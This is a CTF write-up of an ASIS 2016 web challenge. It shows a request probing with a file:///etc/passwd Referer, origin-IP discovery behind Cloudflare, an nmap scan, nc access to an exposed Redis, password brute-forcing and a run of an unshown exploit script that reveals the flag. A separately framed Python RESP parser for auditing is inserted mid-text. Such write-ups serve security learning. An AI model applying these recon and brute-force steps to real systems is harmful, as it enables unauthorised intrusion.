Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
We got a suspicious web service which does nothing at all. If you have time to test it, please help me to leak out all data from it. Thanks!
Hint: The server keeps your access log on submission.
By searching around for a bit, contact.php had very suspicious content.
<h5>By clicking send button, you hereby agree that all your access information are allowed to be reviewed.<h4>
<!-- Note: It's all for analytics.. Don't worry, we won't harm you. -->
By analyzing contact.php, I found a weird URL check on the Referer header.
POST /contact.php HTTP/1.1
Host: ca12379f1163ff045b3ac80842d15bdb.gdn
Connection: keep-alive
Content-Length: 109
Pragma: no-cache
Cache-Control: no-cache
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-CN;q=0.2,zh;q=0.2
Referer: file:///etc/passwd
Cookie: __cfduid=d22559f51eaf8ee0cd770a1564dc3f8f81473527951
fname=name&address=http%3A%2F%2Flocalhost&email=root%40localhost&phone=phone+number&message=message&send=send
HTTP/1.1 200 OK
Date: Sun, 11 Sep 2016 15:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare-nginx
CF-RAY: 2e0c1e2bbfde3a54-ICN
3aa
(... skipped some tags ..)
<div id="body">Invalid
6
param.
0
Then I changed the Referer to https://ctf.stypr.com/test.php and got the real IP address of the domain.
For further pentesting, I assumed that discovering the real IP would be the best way to inspect deeper parts of the service (Cloudflare is a CDN in front of the website, so the domain resolves to Cloudflare's edge and does not reveal the origin server's IP address).
66.172.33.176 (-) [11/Sep/2016:12:31:48 +0900] "GET /test.php HTTP/1.1" 200 505 "-" 0.005
From here, I used nmap to see whether any potentially vulnerable ports were open.
$ nmap -sT 66.172.33.176 -p1024-10240
Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-11 12:41 JST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 00:27 (0:00:33 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.48% done; ETC: 00:27 (0:00:17 remaining)
Nmap scan report for ip-66-172-33-176.chunkhost.com (66.172.33.176)
Host is up (0.11s latency).
Not shown: 10157 closed ports
PORT STATE SERVICE
3702/tcp filtered unknown
6226/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds
Then I connected to port 6226 to check for available commands, and realized that it was Redis running behind it.
$ nc 66.172.33.176 6226
HELP
-ERR unknown command 'HELP'
INFO
-NOAUTH Authentication required.
AUTH stypr
-ERR invalid password
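The nc session above is the Redis wire protocol (RESP) in plain text: the commands typed into nc are sent in RESP's inline form, and every reply comes back as a RESP frame (-ERR, -NOAUTH, +OK). The following helpers are an added example for this write-up, not the author's brute forcer or exploit.py; they encode a command the way redis-cli does, parse replies, and classify what a reply tells an auditor about the instance's authentication state. The reply bytes are constructed from the session above.

```python
"""Minimal RESP (Redis serialization protocol) encoder/parser plus an auth-state classifier."""

def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array, the form redis-cli sends (nc above used the inline form)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)

def _parse(data: bytes, pos: int):
    """Parse one RESP frame starting at pos; returns ((kind, value), next_pos)."""
    end = data.index(b"\r\n", pos)
    head, body = data[pos:pos + 1], data[pos + 1:end]
    nxt = end + 2
    if head == b"+":
        return ("status", body.decode()), nxt
    if head == b"-":
        return ("error", body.decode()), nxt
    if head == b":":
        return ("int", int(body)), nxt
    if head == b"$":                                  # bulk string: length, then payload
        n = int(body)
        if n < 0:
            return ("bulk", None), nxt                # $-1 is the null bulk string
        return ("bulk", data[nxt:nxt + n].decode()), nxt + n + 2
    if head == b"*":                                  # array: count, then nested frames
        items = []
        for _ in range(int(body)):
            item, nxt = _parse(data, nxt)
            items.append(item)
        return ("array", items), nxt
    raise ValueError(f"unknown RESP type byte {head!r}")

def parse_reply(data: bytes):
    """Parse a single complete reply into (kind, value)."""
    reply, _ = _parse(data, 0)
    return reply

def auth_state(reply) -> str:
    """What a reply to INFO or AUTH tells a defender: is requirepass set, and did AUTH succeed?"""
    kind, value = reply
    if kind == "error" and value.startswith("NOAUTH"):
        return "password required"                    # requirepass is configured
    if kind == "error" and "invalid password" in value:
        return "password rejected"
    if kind == "status" and value == "OK":
        return "authenticated"
    if kind == "error":
        return "error"
    return "unprotected"                              # data came back without any AUTH
```

A reply to INFO that parses as a bulk string rather than -NOAUTH means the instance answers without a password, which is the state a Redis exposure audit should flag first.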
There are a lot of Redis brute-force tools available online; however, I made my own brute forcer since it's easy to make and tools like enteletaor didn't work out well.
I used the top 10000 password wordlist and got the correct authentication with the password crunch.
Then I looked around and googled for any possible Redis vulnerability and found this good resource.
Now the only part left was to find the correct username.
Since the website was made by acid (as seen in the footer of the website), I assumed the username was acid and wrote an exploit for the challenge.
Please check exploit.py to view the source code.
$ python exploit.py
Password: crunch
OK
OK
OK
OK
OK
ASIS{55ab63e61cac968dd1da217dab2d86b8}
Connection to 66.172.33.176 closed.
ASIS{55ab63e61cac968dd1da217dab2d86b8}